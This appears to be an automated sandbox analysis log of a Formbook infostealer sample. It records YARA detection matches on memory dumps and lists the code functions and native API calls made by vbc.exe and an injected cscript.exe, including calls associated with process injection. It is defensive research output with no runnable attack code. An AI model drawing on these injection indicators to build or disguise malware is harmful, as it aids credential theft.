          Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_004030E3
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004060434_2_00406043
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004046184_2_00404618
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040681A4_2_0040681A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_10015C814_2_10015C81
          Source: C:\Users\Public\vbc.exeCode function: 4_2_100144A24_2_100144A2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_10014A144_2_10014A14
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000C64B4_2_1000C64B
          Source: C:\Users\Public\vbc.exeCode function: 4_2_10013F304_2_10013F30
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000CB3F4_2_1000CB3F
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000CF574_2_1000CF57
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000D38C4_2_1000D38C
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000F39D4_2_1000F39D
          Source: C:\Users\Public\vbc.exeCode function: 4_2_10016B9C4_2_10016B9C
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000D7C14_2_1000D7C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D8565_2_0041D856
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D9F95_2_0041D9F9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041DBBF5_2_0041DBBF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041DC1B5_2_0041DC1B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041E5C45_2_0041E5C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D885_2_00402D88
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409E605_2_00409E60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D7D55_2_0041D7D5
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041DF8C5_2_0041DF8C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0077905A5_2_0077905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007630405_2_00763040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0078D0055_2_0078D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075E0C65_2_0075E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075E2E95_2_0075E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008012385_2_00801238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007AA37B5_2_007AA37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007673535_2_00767353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008063BF5_2_008063BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007623055_2_00762305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007863DB5_2_007863DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075F3CF5_2_0075F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079D47D5_2_0079D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007954855_2_00795485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007714895_2_00771489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A65405_2_007A6540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076351F5_2_0076351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0077C5F05_2_0077C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007AA6345_2_007AA634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008026225_2_00802622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076E6C15_2_0076E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007646805_2_00764680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007957C35_2_007957C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076C7BC5_2_0076C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E579A5_2_007E579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0078286D5_2_0078286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076C85C5_2_0076C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007FF8EE5_2_007FF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0080098E5_2_0080098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E59555_2_007E5955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E394B5_2_007E394B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007769FE5_2_007769FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007629B25_2_007629B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00813A835_2_00813A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0080CBA45_2_0080CBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00787B005_2_00787B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075FBD75_2_0075FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007EDBDA5_2_007EDBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076CD5B5_2_0076CD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00790D3B5_2_00790D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007FFDDD5_2_007FFDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0077EE4C5_2_0077EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00792E2F5_2_00792E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0078DF7C5_2_0078DF7C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00770F3F5_2_00770F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007FCFB15_2_007FCFB1
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041D8565_1_0041D856
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004010305_1_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041D9F95_1_0041D9F9
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041DBBF5_1_0041DBBF
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041DC1B5_1_0041DC1B
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041E5C45_1_0041E5C4
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D885_1_00402D88
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D905_1_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00409E605_1_00409E60
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041D7D55_1_0041D7D5
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041DF8C5_1_0041DF8C
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402FB05_1_00402FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023D12387_2_023D1238
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0232E2E97_2_0232E2E9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023323057_2_02332305
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0237A37B7_2_0237A37B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023373537_2_02337353
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023563DB7_2_023563DB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0232F3CF7_2_0232F3CF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0235D0057_2_0235D005
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0234905A7_2_0234905A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023330407_2_02333040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0232E0C67_2_0232E0C6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023D26227_2_023D2622
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023346807_2_02334680
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0233E6C17_2_0233E6C1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0233C7BC7_2_0233C7BC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023B579A7_2_023B579A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023657C37_2_023657C3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0236D47D7_2_0236D47D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023654857_2_02365485
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023414897_2_02341489
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0233351F7_2_0233351F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0234C5F07_2_0234C5F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023E3A837_2_023E3A83
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02357B007_2_02357B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023DCBA47_2_023DCBA4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023BDBDA7_2_023BDBDA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0232FBD77_2_0232FBD7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0235286D7_2_0235286D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0233C85C7_2_0233C85C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023CF8EE7_2_023CF8EE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023B59557_2_023B5955
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023329B27_2_023329B2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023D098E7_2_023D098E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023469FE7_2_023469FE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02362E2F7_2_02362E2F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0234EE4C7_2_0234EE4C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02340F3F7_2_02340F3F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0235DF7C7_2_0235DF7C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02360D3B7_2_02360D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0233CD5B7_2_0233CD5B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023CFDDD7_2_023CFDDD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008E5C47_2_0008E5C4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0008D9F87_2_0008D9F8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00072D887_2_00072D88
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00072D907_2_00072D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00079E607_2_00079E60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00072FB07_2_00072FB0
          Source: C:\Users\Public\vbc.exeCode function: String function: 007A3F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007CF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0075DF5C appears 119 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0075E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007A373B appears 244 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0041C1E0 appears 38 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0232DF5C appears 112 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0239F970 appears 81 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0232E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 02373F92 appears 108 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0237373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A360 NtCreateFile,5_2_0041A360
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A410 NtReadFile,5_2_0041A410
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A490 NtClose,5_2_0041A490
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A540 NtAllocateVirtualMemory,5_2_0041A540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A45A NtReadFile,5_2_0041A45A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A40A NtReadFile,5_2_0041A40A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750078 NtResumeThread,LdrInitializeThunk,5_2_00750078
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00750048
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007500C4 NtCreateFile,LdrInitializeThunk,5_2_007500C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074F900 NtReadFile,LdrInitializeThunk,5_2_0074F900
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074F9F0 NtClose,LdrInitializeThunk,5_2_0074F9F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0074FAE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0074FAD0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0074FB68
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0074FBB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0074FC60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0074FC90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0074FDC0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FD8C NtDelayExecution,LdrInitializeThunk,5_2_0074FD8C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0074FED0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0074FEA0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FFB4 NtCreateSection,LdrInitializeThunk,5_2_0074FFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750060 NtQuerySection,5_2_00750060
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007510D0 NtOpenProcessToken,5_2_007510D0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00751148 NtOpenThread,5_2_00751148
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075010C NtOpenDirectoryObject,5_2_0075010C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007501D4 NtSetValueKey,5_2_007501D4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007507AC NtCreateMutant,5_2_007507AC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074F8CC NtWaitForSingleObject,5_2_0074F8CC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00751930 NtSetContextThread,5_2_00751930
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074F938 NtWriteFile,5_2_0074F938
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FA50 NtEnumerateValueKey,5_2_0074FA50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FA20 NtQueryInformationFile,5_2_0074FA20
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FAB8 NtQueryValueKey,5_2_0074FAB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FB50 NtCreateKey,5_2_0074FB50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FBE8 NtQueryVirtualMemory,5_2_0074FBE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750C40 NtGetContextThread,5_2_00750C40
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FC48 NtSetInformationFile,5_2_0074FC48
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FC30 NtOpenProcess,5_2_0074FC30
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FD5C NtEnumerateKey,5_2_0074FD5C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00751D80 NtSuspendThread,5_2_00751D80
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FE24 NtWriteVirtualMemory,5_2_0074FE24
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FF34 NtQueueApcThread,5_2_0074FF34
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FFFC NtCreateProcessEx,5_2_0074FFFC
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A360 NtCreateFile,5_1_0041A360
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A410 NtReadFile,5_1_0041A410
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A490 NtClose,5_1_0041A490
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A540 NtAllocateVirtualMemory,5_1_0041A540
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A45A NtReadFile,5_1_0041A45A
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A40A NtReadFile,5_1_0041A40A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023200C4 NtCreateFile,LdrInitializeThunk,7_2_023200C4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023207AC NtCreateMutant,LdrInitializeThunk,7_2_023207AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FAB8 NtQueryValueKey,LdrInitializeThunk,7_2_0231FAB8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0231FAE8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0231FAD0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0231FB68
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FB50 NtCreateKey,LdrInitializeThunk,7_2_0231FB50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0231FBB8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231F900 NtReadFile,LdrInitializeThunk,7_2_0231F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231F9F0 NtClose,LdrInitializeThunk,7_2_0231F9F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0231FED0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FFB4 NtCreateSection,LdrInitializeThunk,7_2_0231FFB4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0231FC60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FD8C NtDelayExecution,LdrInitializeThunk,7_2_0231FD8C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0231FDC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02320078 NtResumeThread,7_2_02320078
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02320060 NtQuerySection,7_2_02320060
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02320048 NtProtectVirtualMemory,7_2_02320048
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023210D0 NtOpenProcessToken,7_2_023210D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0232010C NtOpenDirectoryObject,7_2_0232010C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02321148 NtOpenThread,7_2_02321148
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_023201D4 NtSetValueKey,7_2_023201D4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FA20 NtQueryInformationFile,7_2_0231FA20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FA50 NtEnumerateValueKey,7_2_0231FA50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FBE8 NtQueryVirtualMemory,7_2_0231FBE8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231F8CC NtWaitForSingleObject,7_2_0231F8CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02321930 NtSetContextThread,7_2_02321930
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231F938 NtWriteFile,7_2_0231F938
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FE24 NtWriteVirtualMemory,7_2_0231FE24
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FEA0 NtReadVirtualMemory,7_2_0231FEA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FF34 NtQueueApcThread,7_2_0231FF34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FFFC NtCreateProcessEx,7_2_0231FFFC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FC30 NtOpenProcess,7_2_0231FC30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_02320C40 NtGetContextThread,7_2_02320C40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0231FC48 NtSetInformationFile,7_2_0231FC48
